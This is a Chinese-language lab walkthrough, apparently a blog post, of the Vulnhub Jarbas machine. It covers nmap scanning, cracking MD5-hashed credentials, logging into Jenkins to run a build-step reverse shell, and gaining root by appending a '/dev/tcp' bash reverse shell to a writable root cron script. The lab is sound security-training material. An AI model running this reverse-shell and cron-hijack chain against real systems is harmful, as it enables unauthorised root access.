当前位置: 首页 > news >正文

[Vulhub靶机]JARBAS靶机渗透

[Vulhub靶机]JARBAS靶机渗透

靶机搭建

下载地址:

https://download.vulnhub.com/jarbas/Jarbas.zip

下载后设置nat模式即可与攻击机同一网段

kali:192.168.88.133

image-20251014142813893

1.信息收集

主机发现

首先对C段进行扫描,发现131这台主机

sudo nmap -sn 192.168.88.0/24

image-20251014143339532

端口扫描

接下来对这台主机的端口进行4次扫描,第一次快速的tcp扫描,第二次常见端口的udp扫描,第三次详细的tcp扫描(针对已经探测出来的端口),第四次启用nmap自带的漏扫进行扫描(也是探测出来的端口)

TCP快速扫描
sudo nmap -sT --min-rate=10000 -p- 192.168.88.131 -oA vulhub/JarBas/nmapports1-p- 扫描全端口
--min-rate=10000 设置最小的扫描速率
UDP扫描
sudo nmap -sU --top-port 20 192.168.88.131 -oA vulhub/JarBas/udp-ports1--top-port 常见20个端口

image-20251014144640368

接下来把TCP端口的信息整合在变量上,下两次扫描命令更好写

image-20251014144952932

TCP详细扫描探测出的端口信息

sudo nmap -sT -sV -sC -O -p21,22,80,3306,8080 192.168.88.131 -oA vulhub/JarBas/details1

image-20251015200158275

使用漏洞脚本扫描

sudo nmap --script=vuln -p21,22,80,3306,8080 192.168.88.131 -oA vulhub/JarBas/vuln1

image-20251016180253666

2.漏洞探测发现

Mysql渗透

查看了一下未授权,无果就直接放弃了

sudo mysql -h 192.168.88.131 -u root -p 

Web渗透

查看后是默认的页面。

image-20251015193420849

使用dirsearch扫一下目录

dirsearch -u 192.168.88.131

查看/access.html

image-20251015193451624

写着凭证以安全的方式进行了加密,尝试使用hash-identifier识别一下这个密文

image-20251015193623120

识别大概率是md5

image-20251015193835334

成功解密,对应密文如下 第一反应是ssh登录,mysql登录,但是都没有成功

tiago:italia99
trindade:marianna
eder:vipsu

image-20251015193847757

接着访问到了8080端口,为一套很常见的cms-Jenkins。那先尝试一下nmap扫的robots.txt以及刚刚找到的这三个用户和弱口令尝试

image-20251016180026543

发现第三个用户eder成功登录

image-20251016180457840

那随机去搜索一下Jenkins的漏洞

创建项目,然后执行shell命令,写入反弹shell,kali开启监听。

image-20251016193604038

点击Build_Now 执行刚刚创建的项目,成功反弹。但是权限很低。很多命令无法执行

jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false

image-20251016193954624

查看定时任务

cat /etc/crontab 

发现每五分钟会以root权限执行如下脚本

image-20251016194839016

查看到有写入的权限,将反弹shell写入sh脚本中 kali开启监听

echo "/bin/bash -i >& /dev/tcp/192.168.88.133/4443 0>&1" >> /etc/script/CleaningScript.sh
nc -lvvp 4443

image-20251016195242479

成功拿到root权限

image-20251016195611030

http://www.hskmm.com/?act=detail&tid=32569

相关文章:

  • 10月16号
  • CF622D 题解
  • vue学习的总结
  • 最小二乘问题详解5:非线性最小二乘求解实例
  • AlexNet
  • 【28】C# WinForm入门到精通 ——多文档窗体MDI【属性、强大的方法、实例、源码】【多窗口重叠、水平平铺、垂直平铺、窗体传值】
  • 第五周预习
  • 2025 非标门/铸铝门/别墅大门厂家推荐榜:聚焦品质与服务的实力之选
  • 工业数字化未来:IT与OT融合实践
  • AI安全新威胁:提示注入与模型中毒攻击深度解析
  • 神经网络入门研读报告
  • 阅读《记录一类分治方法》笔记
  • CF2140E2
  • Codeforces 380E Sereja and Dividing 题解 [ 紫 ] [ 线段树 ] [ 贪心 ] [ 数学 ]
  • JPA教程
  • 夜莺监控设计思考(二)边缘机房架构思考
  • 搜维尔科技:具有人手级别抓握和操纵能力的灵巧手
  • v-model 的实现原理
  • 防塔游戏单机 王国保卫战全集下载 1~5部全系列MOD DLC修改版 安卓+ios+PC电脑版
  • 德州东站换乘攻略(仅供参考)
  • 第十六篇
  • Date 2025.10.6
  • 实验作业2
  • macOS 双开/多开微信WeChat完整教程(支持 4.X 及以上版本) - 实践
  • 快捷运用电脑的方式(不使用鼠标)
  • 2025.10.16总结 - A
  • 初识pytorch:更新网络参数的反向传播、损失函数和优化器
  • Composition API 与 React Hook 很像,区别是什么?
  • 题解:CF1483E Vabank
  • 20251016 正睿二十连测